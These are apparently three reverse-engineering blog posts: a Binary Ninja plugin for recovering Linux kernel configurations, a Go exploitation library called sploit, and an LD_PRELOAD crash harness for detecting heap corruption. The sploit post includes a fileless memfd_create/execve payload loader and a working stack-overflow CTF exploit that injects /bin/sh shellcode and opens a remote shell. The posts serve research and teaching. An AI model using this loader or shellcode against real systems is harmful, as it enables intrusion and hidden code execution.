Automated RE of Kernel Configurations

Kconfig (short for kernel configuration) is a component of the the Kbuild build system for the Linux kernel. The Linux kernel is highly customizable, and configuration is required to build the kernel and generate kernel headers. In this blog post, I am introducing a new Binary Ninja plugin that analyzes Linux kernel binaries to recover kernel configuration options.

There are many reasons that one might need to recover a Linux kernel configuration post-build. My inspiration for this project is to make it easier to generate kernel headers for building LKMs that will load on target Linux devices (where source isn’t available). Linux consists of multiple mechanisms to verify LKMs during load to ensure that they are compatible and won’t cause the kernel to become unstable. By recovering a Linux kernel’s build configuration, the kernel can be built and compatible kernel headers can be generated from the upstream source. These kernel headers can be used to build LKMs that will [hopefully] load on the target device.

Intro to Kconfig

Kbuild is the Linux kernel build system. It primarily exists to parse the Kconfig macro language and set the proper flags (based on the user-provided configuration options) during build. Under the hood, it uses GNU make. The first step when building Linux is to create the .config file. This is the configuration. During build these options are used to set C preprocessor definitions, define symbols, and more. A more thorough explanation of the kernel build process can be found here. The rest of this section is focused solely on the format of the generated .config file.

Linux build configuration begins by specifying the architecture for the platform the kernel is intended to run on. When the architecture is specified, Kbuild processes the corresponding Kconfig file. The Kconfig file consists of a custom macro language that Kbuild uses to know which configuration options to set automatically and which options to ask the user to set. Tools like menuconfig build a tree-like menu that the user can edit to change options. After all the options are supplied, the .config file gets generated. This is a text file that resembles the following format:

#
# Automatically generated file; DO NOT EDIT.
# Linux/x86 4.19.208 Kernel Configuration
#

#
# Compiler: gcc-8 (Debian 8.3.0-6) 8.3.0
#
CONFIG_CC_IS_GCC=y
CONFIG_GCC_VERSION=80300
CONFIG_CLANG_VERSION=0
CONFIG_CC_HAS_ASM_GOTO=y
CONFIG_IRQ_WORK=y
CONFIG_BUILDTIME_EXTABLE_SORT=y
CONFIG_THREAD_INFO_IN_TASK=y

#
# General setup
#
CONFIG_INIT_ENV_ARG_LIMIT=32
# CONFIG_COMPILE_TEST is not set
CONFIG_LOCALVERSION=""
# CONFIG_LOCALVERSION_AUTO is not set
CONFIG_BUILD_SALT="4.19.0-18-amd64"
...

Reverse Engineering Configuration Options

Most configuration options can be recovered by analyzing the Linux kernel binary post-build. Doing this manually is a time intensive and tedious task, depending on how many options you need to reverse engineer. This section describes how you can reverse a config option manually, and how the Binary Ninja API can be leveraged to do it for you.

The first option I will use for demonstration is the CONFIG_BUILD_SALT configuration. By looking at the upstream Linux kernel source code we can determine that the CONFIG_BUILD_SALT is used to define the utsname version member. The source code also indicates that the sched_debug_header function supplies the utsname version string as the fourth argument for a call to seq_printf.

static void sched_debug_header(struct seq_file *m)
{
	u64 ktime, sched_clk, cpu_clk;
	unsigned long flags;

	local_irq_save(flags);
	ktime = ktime_to_ns(ktime_get());
	sched_clk = sched_clock();
	cpu_clk = local_clock();
	local_irq_restore(flags);

	SEQ_printf(m, "Sched Debug Version: v0.11, %s %.*s\n",
		init_utsname()->release,
		(int)strcspn(init_utsname()->version, " "),
		init_utsname()->version);

By proceeding to locate and analyze the sched_debug_header in the Linux kernel binary we can see that it corresponds with the code in the upstream kernel source, and can conclude that the fourth argument in the call to seq_printf is indeed a pointer to the utsname version string.

sched_debug_header call to seq_printf

If doing this manually, we would proceed to open our config file in a text editor and type CONFIG_BUILD_SALT="4.19.0-18-amd64". Instead, we’re going to use the Binary Ninja API to automate this operation by writing code that takes the following steps:

  1. Locate the sched_debug_header function
  2. Iterate through the function’s HLIL instructions to locate the first call to seq_printf
  3. Get the fourth argument for the call to seq_printf and verify that it is a pointer
  4. Get the string that the pointer is pointing to (the build version)
    def _recover_config_build_salt(self) -> str:
        syms = self.bv.get_symbols_by_name('sched_debug_header')
        if not syms:
            logging.error('Failed to lookup sched_debug_header')
            return None

        sched_debug_header = self.bv.get_function_at(syms[0].address)
        if not sched_debug_header:
            logging.error('Failed to get function sched_debug_header')
            return None

        syms = self.bv.get_symbols_by_name('seq_printf')
        if not syms:
            logging.error('Failed to lookup seq_printf')
            return None

        call_to_seq_printf = None
        for block in sched_debug_header.high_level_il:
            for instr in block:
                if instr.operation != HighLevelILOperation.HLIL_CALL:
                    continue

                if instr.dest.operation != HighLevelILOperation.HLIL_CONST_PTR:
                    continue

                if to_ulong(instr.dest.constant) == syms[0].address:
                    if len(instr.params) < 3:
                        logging.error(
                            'First call in sched_debug header is not to seq_printf!?'
                        )
                        return None

                    if instr.params[
                            2].operation != HighLevelILOperation.HLIL_CONST_PTR:
                        logging.error(
                            'param3 of seq_printf call is not a pointer')
                        return None

                    s = self.bv.get_ascii_string_at(
                        to_ulong(instr.params[2].constant))
                    if not s:
                        logging.error('Failed to get build salt string')
                        return None

                    return s.value

Thankfully, not all of the configuration options require analyzing code. Many configuration options can be determined based on the presence of a symbol for an exported function or global data variable. An example of this type of option is CONFIG_TICK_ONESHOT. By looking at the Linux upstream source code we can see that this option is used by a Makefile to determine whether or not to use the tick-broadcast-hrtimer.o object file as part of the kernel build.

obj-$(CONFIG_GENERIC_CLOCKEVENTS)		+= clockevents.o tick-common.o
ifeq ($(CONFIG_GENERIC_CLOCKEVENTS_BROADCAST),y)
 obj-y						+= tick-broadcast.o
 obj-$(CONFIG_TICK_ONESHOT)			+= tick-broadcast-hrtimer.o
endif

This means that if any symbols defined in tick-broadcast-hrtimer.c are in the resulting kernel build, then CONFIG_TICK_ONESHOT is set. Otherwise, it is not set. tick-broadcast-hrtimer.c exports the function tick_program_event. By writing code around the BN API, we can automate recovery of this option:

    def _set_if_symbol_present(self, name: str) -> ConfigStatus:
        if self.bv.get_symbols_by_name(name):
            return ConfigStatus.SET

    def _recover_config_tick_oneshot(self) -> ConfigStatus:
        return self._set_if_symbol_present('tick_program_event')

The code above attempts to lookup the tick_program_event symbol. If the lookup fails, then the CONFIG_TICK_ONESHOT configuration option is not set. If the lookup succeeds then it is set. There are many types of configuration options. A large portion of them can be knocked out using the symbol lookup method. Others require analyzing code, data structures, and more.

What about /proc/config.gz?

RE of the kernel binary is not always necessary to gain access to the Linux kernel configuration. Sometimes kernels are built with the following configurations options:

CONFIG_IKCONFIG=y
CONFIG_IKCONFIG_PROC=y

Kernels built with the “in-kernel configuration support” bundle contain the kernel configuration file in the kernel binary. On the running system, the configuration is exposed to user-space at /proc/config.gz. In this scenario, the config.gz archive can be copied off of the device and used to reproduce the build. However, it is my experience that most distributed Linux kernels don’t use this configuration. Hence, why it is often necessary to resort to RE.

Introducing bn-kconfig-recover

I have released a Binary Ninja plugin, bn-kconfig-recover, to automate recovery of kernel configuration options. Currently, this plugin is able to recover configuration options for general setup, the IRQ subsystem, the timer subsystem, and CPU/Task time and stats accounting. To use the plugin, create a kernel Binary Ninja database (BNDB) populated with symbols for exports from the kernel symbol table. The datavars branch of my bn-kallsyms plugin can be used to help apply symbols from /proc/kallsyms. Other methods for applying symbols exists as well (see the vmlinux-to-elf project). After creating the kernel BNDB, run the bn_kconfig_recover.py script headless. Supply the path to the kernel BNDB and the path for the output config file.

Once it is complete, it will create a configuration file containing entries for all supported configuration options.

Plugin Limitations

There are a few limitations to this plugin. First, the plugin is not complete. There are thousands of Linux configuration options. Adding support for all configuration options is work in progress. I plan to continue to add support for more options a sub-system at a time. I will gladly accept pull requests from community contributors as well. Limitations to the approach itself includes:

  • Many of the configuration options are dependent on symbols. The Linux kernel must provide symbols for exported functions and data variables in the kernel symbol table to support loading LKMs. However, if the kernel is built without LKM support (like Android kernels), the kernel doesn’t need to provide symbols and is built without a kernel symbol table. In this scenario, symbols required by bn-kconfig-recover would need to be applied manually in the BNDB. Depending on your use-case this could be a non-starter.
  • There are many kernel versions. This plugin has only been tested on 4.* kernels for x86-64. Development was done using a 4.19 kernel. As development progresses, I will likely need to change config option-specific heuristics to support multiple kernel versions and architectures. For now, there may be false positives when running the plugin on newer 5.* or old kernels (< 3.*).
  • Not all kernel developers follow the rules. Often times, engineering teams make proprietary modifications to the Linux source code. This can potentially cause recovery of certain config options to be inaccurate.

Conclusion

Recovering Linux kernel configurations is one example of many tedious reverse engineering tasks that can be automated. I believe this is a worthwhile pursuit that can aid in many scenarios to include LKM development, kernel exploit development, and interface compatibility development. My Binary Ninja plugin can be found here. If you are interested in this tool feel free to follow the project, submit issues, and contribute pull requests. Thanks for reading!

Sploit – Binary Analysis and Exploitation with Go

Sploit is a Go package that aids in binary analysis and exploitation. In this blog post, I describe some of the core features of sploit and how it can be used for capture the flag as well as practical reverse engineering and exploit development.

Introduction to Sploit

I decided to create sploit to invest in a open source framework that isn’t built on top of commercial software, but provides a powerful headless API for automating reverse engineering and exploit development tasks. The current release (v0.1.0) consists of the following features:

  • ELF interface that provides the ability to parse ELF files and access data by virtual address
  • Capstone integration for disassembling machine code
  • Assembly interface for compiling assembly to machine code (backed by GNU toolchain)
  • ROP interface that supports filters to aid in locating specific gadgets
    • Currently, x86-64 and x86 only
  • Pack/unpack methods for more easily converting between byte slices and integer types
  • Remote interface that provides helpers for socket communication
  • Shellcode sub-package that uses JIT-compilation to emit configured exploit payloads
  • Support for ARM, AArch64, PPC, MIPS, x86, and x86-64 CPU architectures

Why Go?

This project is undeniably inspired by other frameworks such as pwntools and angr that are predominately written in Python. Python has taken over the reverse engineering world, understandably so. It is a powerful, high level language. It is easy to work with and is excellent for rapid prototyping, a trait that is especially important for exploit development. I’ve come to accept that whether it’s an IDA plugin, GDB script, or some recipe to automate a task, I’ll likely spend a small percentage of my time writing Python for the foreseeable future. However, coming from an embedded C background, I have never been a Python fan. I don’t like dynamic types, concurrency and unicode support were an afterthought, and Python programs are comparatively slower and less efficient than programs developed using other modern programming languages. Over the years, I have experimented with many Python alternatives. I wrote packages for Julia language and tried JVM based languages such as Scala and Clojure. About a year ago, I decided to learn Go. While I’ve found things I dislike about the language, it is the first high level language I’ve truly enjoyed using. Like Python it has a large standard library and is heavily adopted. Unlike Python it has excellent support for concurrency, is statically typed, and is able to be cross-compiled to run on over 15 different CPU architectures. It’s structure support and extensive list of numeric types make it especially well suited for security engineering where it’s not uncommon to have to work with binary file and wire formats. For these reasons I chose to use Go for sploit.

ELF Analysis

Go’s standard library contains a debug/elf package for handling ELF object files. Sploit’s ELF interface is built on top of it and acts as an abstraction layer to provide higher level methods that allow for using virtual addresses (VA) to operate on data in ELF segments. The ELF API encompasses methods that allow for data access and type transformations, binary signature searches, and code disassembly. The following example demonstrates locating and disassembling the _start routine in an ELF executable. This shows how the underlying debug/elf object is preserved and exported through sploit so we can leverage the lower level APIs to access ELF headers directly and query the e_entry. The e_entry field is a file offset so we use sploit to resolve the virtual address from the offset and disassemble the code. For brevity, I’ve chosen to omit error handling.

package main

import (
    "fmt"
    sp "github.com/zznop/sploit"
)

func main() {
    elf, _ := sp.NewELF("prog")
    entry, _ := elf.OffsetToAddr(elf.E.Entry)
    instrs, _ := elf.Disasm(entry, 42)
    fmt.Printf("_start  :\n%s", instrs)
}
> ./startdis 
_start  :
00001050: xor ebp, ebp
00001052: mov r9, rdx
00001055: pop rsi
00001056: mov rdx, rsp
00001059: and rsp, 0xfffffffffffffff0
0000105d: push rax
0000105e: push rsp
0000105f: lea r8, [rip + 0x15a]
00001066: lea rcx, [rip + 0xf3]
0000106d: lea rdi, [rip + 0xc1]
00001074: call qword ptr [rip + 0x2f66]

Assembly Compilation

Sploit is backed by the GNU toolchain and exposes a API that leverages the GNU Assembler (GAS) to just-in-time (JIT) compile assembly instructions to machine code. This can be used directly to write shellcode from scratch or indirectly through the higher level shellcode sploit sub-package. The following example demonstrates compiling x86 (32-bit) assembly and dumping the machine code.

package main;

import(
    "github.com/zznop/sploit"
    "encoding/hex"
    "fmt"
)

func main() {
    instrs := "mov rcx, r12\n"              +
              "mov rdx, r13\n"              +
              "mov r8, 0x1f\n"              +
              "xor r9, r9\n"                +
              "sub rsp, 0x8\n"              +
              "mov qword [rsp+0x20], rax\n"

    arch := &sploit.Processor {
        Architecture: sploit.ArchX8664,
        Endian: sploit.LittleEndian,
    }

    opcode, _ := sploit.Asm(arch, instrs)
    fmt.Printf("Opcode bytes:\n%s\n", hex.Dump(opcode))
}
> ./assemble_example
Opcode bytes:
00000000  4c 89 e1 4c 89 ea 49 c7  c0 1f 00 00 00 4d 31 c9  |L..L..I......M1.|
00000010  48 83 ec 08 48 89 44 24  28                       |H...H.D$(|

On the backend, sploit constructs an assembly prog.S file in /tmp containing the instructions passed to Asm() and shells out to GCC to compile it to a position-independent object file with -c -fpic flags. After building the prog.o object file, sploit shells out to objcopy to dump only the .text section to prog.bin. Sploit then proceeds to read prog.bin and return it as a byte slice. The template for prog.S is depicted below:

.section .text
.global _start
.intel_syntax noprefix
_start:
    // Input instructions get copied here

Shellcoding

Shellcoding can be achieved by using sploit’s Asm() method directly or by using sploit’s shellcode sub-package that provides higher level interfaces for constructing configured payloads that carry out generic tasks such as executing /bin/sh. As a surrogate payload for designing the shellcode interface I chose to integrate my x86-64 linux loader that can be prepended to any ELF executable or bash script to allow it to run in-memory as an exploit payload. I named the method LinuxMemFdExec. It takes a single argument, a byte slice containing the executable that needs to run as the final payload. LinuxMemFdExec compiles the stub assembly by calling the Asm() method, which returns a byte slice containing the unconfigured shellcode. Then, it appends the payload bytes and fixes up the executable_size with the size of the appended executable. The returned result is a byte slice containing the configured shellcode bytes.

// LinuxMemFdExec constructs a payload to run the supplied executable in an anonymous file descriptor
func (x8664 *X8664) LinuxMemFdExec(payload []byte) ([]byte, error) {
	instrs := `
jmp past

executable_size: .quad 0x4141414141414141   /* fixed up with size of executable */
fd_name: .byte 0                            /* emtpy file descriptor name */
fd_path: .ascii "/proc/self/fd/\0\0\0\0\0"  /* path to file descriptor for exec call */

past:
    mov rax, 319                            /* __NR_memfd_create syscall num */
    lea rdi, [rip+fd_name]                  /* ptr to empty file descriptor name */
    mov rsi, 1                              /* MFD_CLOEXEC (close file descriptor on exec) */
    syscall                                 /* create anonymous fd */
    test rax, rax                           /* good file descriptor? */
    js done                                 /* return if bad file descriptor */
    mov rdi, rax                            /* file descriptor (arg_0) */
    mov rax, 1                              /* __NR_write */
    lea rsi, [rip+executable]               /* pointer to executable base (arg_1) */
    mov rdx, qword [rip+executable_size]    /* load size of executable into rdx (arg_2) */
    syscall                                 /* write the executable to the fd */
    cmp rax, rdx                            /* did everything get written successfully? */
    jnz done                                /* fail out if all bytes were not written */
    call fixup_fd_path                      /* fixup the fd path string by converting the fd to a str */
    mov rax, 59                             /* execve syscall num */
    lea rdi, [rip+fd_path]                  /* filename */
    xor rcx, rcx                            /* zeroize rcx (terminator for argv) */
    push rcx                                /* push 0 to stack */
    push rdi                                /* push address of fd path to the stack */
    mov rsi, rsp                            /* argv (address of fd path, null) */
    xor rdx, rdx                            /* envp = NULL */
    syscall                                 /* call execve (won't return if successful) */
    add rsp, 16                             /* restore the stack */
done:
    ret                                     /* return */

/*
 * fixup the fd path string with the file descrpitor -
 * basically sprintf(foo, "/proc/self/fd/%i", fd)
 */

fixup_fd_path:
    mov rax, rdi                            /* number to be converted */
    mov rcx, 10                             /* divisor */
    xor bx, bx                              /* count digits */
.divide:
    xor rdx, rdx                            /* high part = 0 */
    div rcx                                 /* rcx = rcx:rax/rcx, rdx = remainder */
    push dx                                 /* dx is a digit in range [0..9] */
    inc bx                                  /* count digits */
    test rax, rax                           /* rax is 0? */
    jnz .divide                             /* no, continue */

    /* pop digits from stack in reverse order */
    mov cx, bx                              /* number of digits */
    lea rsi, [rip+fd_path]                  /* rsi points to fd path string buffer */
    add rsi, 14                             /* start of location to write the fd (as a string) */
.next_digit:
    pop ax
    add al, '0'                             /* convert to ASCII */
    mov [rsi], al                           /* write it to the buffer */
    inc si
    loop .next_digit
    ret

/* appended script or ELF executable */
executable:
`
	unconfigured, err := sp.Asm(x8664.arch, instrs)
	if err != nil {
		return nil, err
	}

	size := sp.PackUint64LE(uint64(len(payload)))
	configured := bytes.Replace(unconfigured, []byte{0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41}, size, 1)
	configured = append(configured, payload...)
	return configured, nil
}

ROP Gadget Searching

Sploit can be used to write programs for locating gadgets that can be leveraged for Return-oriented Programming (ROP). This can be useful for exploit development. Sploit currently contains limited functionality for searching for specific gadgets using filters (regular expressions). The following example demonstrates how sploit can be used to find and display all gadgets containing a “pop ebp” sub-string.

package main;

import(
    "github.com/zznop/sploit"
)

var program = "../test/prog1.x86_64"

func main() {
    elf, _ := sploit.NewELF(program)
    rop, _ := elf.ROP()

    matched, _ := rop.InstrSearch("pop rbp")
    matched.Dump()
}
0000111f: pop rbp ; ret
0000111d: add byte ptr [rcx], al ; pop rbp ; ret
00001118: mov byte ptr [rip + 0x2f11], 1 ; pop rbp ; ret
00001113: call 0x1080 ; mov byte ptr [rip + 0x2f11], 1 ; pop rbp ; ret
000011b7: pop rbp ; pop r14 ; pop r15 ; ret
000011b3: pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
000011b2: pop rbx ; pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
000011af: add esp, 8 ; pop rbx ; pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
000011ae: add rsp, 8 ; pop rbx ; pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret

InstrSearch() returns a ROP type, which can be iterated over to access the underlying Gadget structures. From the Gadget structure you can query the virtual address, instruction text, and opcode bytes.

Solving a CTF Challenge

Sploit consists of many other features not mentioned in this blog post. For brevity, I’ll demonstrate some of the remaining core features by solving a CTF challenge. The challenge is a simple stack overflow pwnable that I found online. I’ve provided a screenshot of the assembly below.

Pwnable CTF Challenge Instructions

The challenge starts by pushing 20 bytes of ASCII onto the stack (“Let’s start the CTF:”) and writes it to stdout. Then it reads 60 bytes onto the stack beginning at var_1c. From var_1c there is only 20 bytes of space until the return address on the stack. Therefore, we are able to overflow to overwrite the return address. For this challenge, the stack is executable. We’ll exploit this program by writing a Go solution around sploit that completes the following steps:

  1. Send 20 junk bytes and an address (0x08048087) to overwrite the return address with and trigger an info leak. This will cause the write syscall to run twice. The second time it runs, the stack frame will have been reset, causing it to write a stack pointer to stdout.
  2. Extract the stack address and construct a second buffer to overflow the return address a second time to return to our payload. Note: after it leaks the stack address with the write syscall the program blocks on the read syscall
package main

import (
    sp "github.com/zznop/sploit"
)

var arch = &sp.Processor{
    Architecture: sp.ArchI386,
    Endian:       sp.LittleEndian,
}

var scInstrs = `mov al, 0xb   /* __NR_execve */
                sub esp, 0x30 /* Get pointer to /bin/sh (see below) */
                mov ebx, esp  /* filename (/bin/sh) */
                xor ecx, ecx  /* argv (NULL) */
                xor edx, edx  /* envp (NULL) */
                int 0x80`

func main() {
    shellcode, _ := sp.Asm(arch, scInstrs)
    r, _ := sp.NewRemote("tcp", "some.pwnable.online:10800")
    defer r.Close()
    r.RecvUntil([]byte("CTF:"), true)

    // Leak a stack address
    r.Send(append([]byte("/bin/sh\x00AAAAAAAAAAAA"), sp.PackUint32LE(0x08048087)...))
    resp, _ := r.RecvN(20)
    leakAddr := sp.UnpackUint32LE(resp[0:4])

    // Pop a shell
    junk := make([]byte, 20-len(shellcode))
    junk = append(junk, sp.PackUint32LE(leakAddr-4)...)
    r.Send(append(shellcode, junk...))
    r.Interactive()
}

The first feature worth mentioning in the solution code is use of sploit’s Remote interface. With the call to NewRemote, sploit establishes a TCP session with the server running on port 10800 at some.pwnable.online (I’ve redacted the real URL). Then, using the RecvUntil method, it receives data until receiving “CTF:”. The second feature worth mentioning is sploit’s unpack/pack interface (see the call to PackUint32LE). These helpers reduce the amount of code required to pack integer types into byte slices in comparison to using binary.LittleEndian.PutUint* functions that require the byte slice buffer to be allocated prior to the call. Many other features used by the solution, such as the payload JIT compilation, have been demonstrated already. The last feature I’d like to point out is the call to remote.Interactive. The Interactive method provides asynchronous I/O and dispatches user-input over the TCP session. In this example, it is used to interact with the remote shell.

Conclusion

Many of sploit’s core features will be familiar to those who have used pwntools. A lot of the core functionality has been designed based on my own experiences using pwntools and other python-based frameworks. As the core becomes more stable I intend on focusing on analysis features and less on the remote interfaces and enhancements to CTF workflows. In the future I plan to incorporate an emulation engine, possibly usercorn and begin adding APIs for dynamic analysis. I also hope to integrate an intermediate language and expand on the disassembly interface to do basic CFG recovery. My end goal is to produce widely adopted Go-based framework that can be used for headless automated reverse engineering and exploit development tasks for cloud-based or continuous integration (CI) applications.

Crash Harnessing with Injected Code

There are many approaches to harnessing programs and instrumenting them for crash analysis and memory profiling. Each technique has benefits and drawbacks. Emulation is often the most reliable method, but requires the largest sacrifice in performance. Specialized hardware such as modern Intel processors can provide code coverage, but doesn’t necessarily provide the ability to profile memory or monitor heap usage. There is also more advanced techniques such as binary re-compilation using frameworks such as McSema/Remill and Egalito that lift compiled code to an intermediate representation to apply instrumentation and re-compile. In this blog post I describe an alternative, yet simple, proof-of-concept to harness and add basic instrumentation to a target program by using a combination of ptrace-based techniques and code injection to profile memory and monitor for crashes. The end result is a crash harness and injected shared object that hooks imported functions to profile dynamic memory and detect scenarios such as heap buffer overflow and use-after-free conditions.

Ich Crash Harness Stack Overflow Detection

Process Trace and LD_PRELOAD

Before diving into more complex implementation details, I’d like to describe the ptrace system call and LD_PRELOAD trick, two Linux operating system features that I based my design around. ptrace, or process trace, is a Linux system call that aids in debugging a running process. The best example of software that uses the ptrace system call is the GNU Debugger (GDB). ptrace allows for attaching to a remote process to trap system calls, write to virtual memory, change registers values, and more. LD_PRELOAD is an environment variable that when supplied instructs the Linux dynamic linker to load a shared object from the specified file path before all other imported libraries. An example of software that abuses the LD_PRELOAD trick is the Jynx rootkit.

Writing a Crash Harness

I started by developing a simple crash harness for x86-64 executables. The harness is designed like strace in that you run the harness and the harness runs the target program. This is acheived by forking and allowing the child process to attach to itself using PTRACE_TRACEME before executing the target program. The parent process calls waitpid in a loop to monitor the child’s status.

int main(int argc, char **argv)
{
    int ret = 1;
    int pid;

    if (argc < 2) {
        printf("./ich [cmd]\n");
        return 1;
    }

    if (init_crash_harness())
        return 1;

    pid = fork();
    if (!pid) {
        /* This won't return */
        spawn_process(&argv[1]);
    } else {
        if (!monitor_execution(pid)) {
            display_crash_dump(pid);
        }
        ptrace(PTRACE_DETACH, pid, 0, 0);
    }

    return 0;
}

If the parent process receives a SIGSEGV from the child process it creates a crash dump displaying register values and virtual memory content. It also queries and dumps the base of the ELF by reading from rip into lower memory using PTRACE_PEEKDATA until the ELF header signature is discovered. The crash monitoring functionality is not unlike many other Linux crash harnesses.

LD_PRELOAD Code Injection

After writing the core of the crash harness, I focused on adding functionality to assist in injecting a shared object into the target program at runtime using the LD_PRELOAD trick. This trick is fairly simple and can be carried out from bash by executing command similar to the line below.

$ export LD_PRELOAD=/path/to/sauce.so && ./some_program

To avoid having to define the LD_PRELOAD environment variable manually during each run, I added LD_PRELOAD to environ (the harness’ environment) and linked in the shared object using .incbin. When running the harness, the shared object (described in the next section) is written to disk at a temporary path. The harness code that spawns the target process is below.

static void spawn_process(char **argv)
{
    char **env = NULL;
    char preload_env[256];
    size_t i = 0;

    memset(preload_env, '\0', sizeof(preload_env));
    snprintf(preload_env, sizeof(preload_env),
             "LD_PRELOAD=%s", HOOK_LIB_PATH);
    info("Setting up the environment: %s", preload_env);

    /* Get count */
    while (environ[i] != NULL)
        i++;
    env = (char **)malloc(i * sizeof(char *));

    /* Copy the environment variables */
    i = 0;
    while (environ[i] != NULL) {
        env[i] = environ[i];
        i++;
    }

    /* Append LD_PRELOAD */
    env[i] = preload_env;
    env[i+1] = NULL;

    info("Executing process (%s) ...\n", argv[0]);
    ptrace(PTRACE_TRACEME, 0, NULL, NULL);
    kill(getpid(), SIGSTOP);
    execve(argv[0], argv, env);

    /* execve only returns on failure */
    err("Failed to execute binary");
    exit(1);
}

Instrumentation Payload (Shared Object)

At this point, I had a crash harness that is capable of pre-loading a shared object into the debuggee and monitoring the debuggee for crashes. Next, I focused on developing the shared object that gets injected into the debuggee to hook libc imports and profile memory. I started by writing functions with identical names and prototypes as libc imports I wanted to hook. Remember, the harness executes the target program with LD_PRELOAD, which tells the dynamic linker to link in this shared object before libc.so (and any other library). The dynamic linker fills in the global offset table with offsets to the pre-loaded shared object’s versions of the target functions. As such, when the program calls malloc it execute’s the pre-loaded shared object’s malloc which reserves 8 bytes of additional memory at the beginning and end of the allocation to write tags (known sequence of random bytes). It does this by adding 16 bytes to the size parameter for malloc before calling the real libc:malloc using the following macro:

#define LOAD_SYM(sym, type, name) {         \
    if (!sym) {                             \
        sym = (type)dlsym(RTLD_NEXT, name); \
        if (!sym)                           \
            FAIL();                         \
    }                                       \
}

When libc:malloc returns, my malloc writes an 8 byte tag at the beginning and end of the allocation. It also stores metadata on tagged allocation in a global linked list. Then, it increments the return pointer by 8 (past the start of the tag) and returns back to the target program. Likewise, with free, my free iterates through the linked list to see if the allocation is tagged. If it is, it decrements the pointer by 8 bytes and calls libc:free to properly free the allocation.

In addition to malloc and free the pre-loaded shared object also hooks copy imports such as memcpystrncpy, and more. My memcpy calls libc:memcpy and then iterates through the global linked list containing metadata on tagged allocations and checks if any tags have been altered. If a tag is altered, the pre-loaded library forcefully crashes the program by executing an illegal instruction. This causes the crash harness to emit a crash dump.

Conclusion

There are many limitations to this approach. For example, dynamic memory can be modified without using imported functions. If this occurs and a tag is tainted, the instrumentation library will not detect it until the next time a hooked import is called by the program. Moreover, an OOB write could occur before the start tag or after the end tag in which case unless it causes additional memory corruption or an access violation, the program could continue to run. Also, the LD_PRELOAD trick does not work for static libraries and some linkers (such as Android’s) doesn’t support it. Limitations aside, this approach can be adapted for other use cases such as visualizing heaps or altering execution of a program for debugging purposes. It can be used in combination with other binary instrumenting techniques.

All code described in this blog post is contained in my crash harness, ich, which can be found here. Thank you for reading!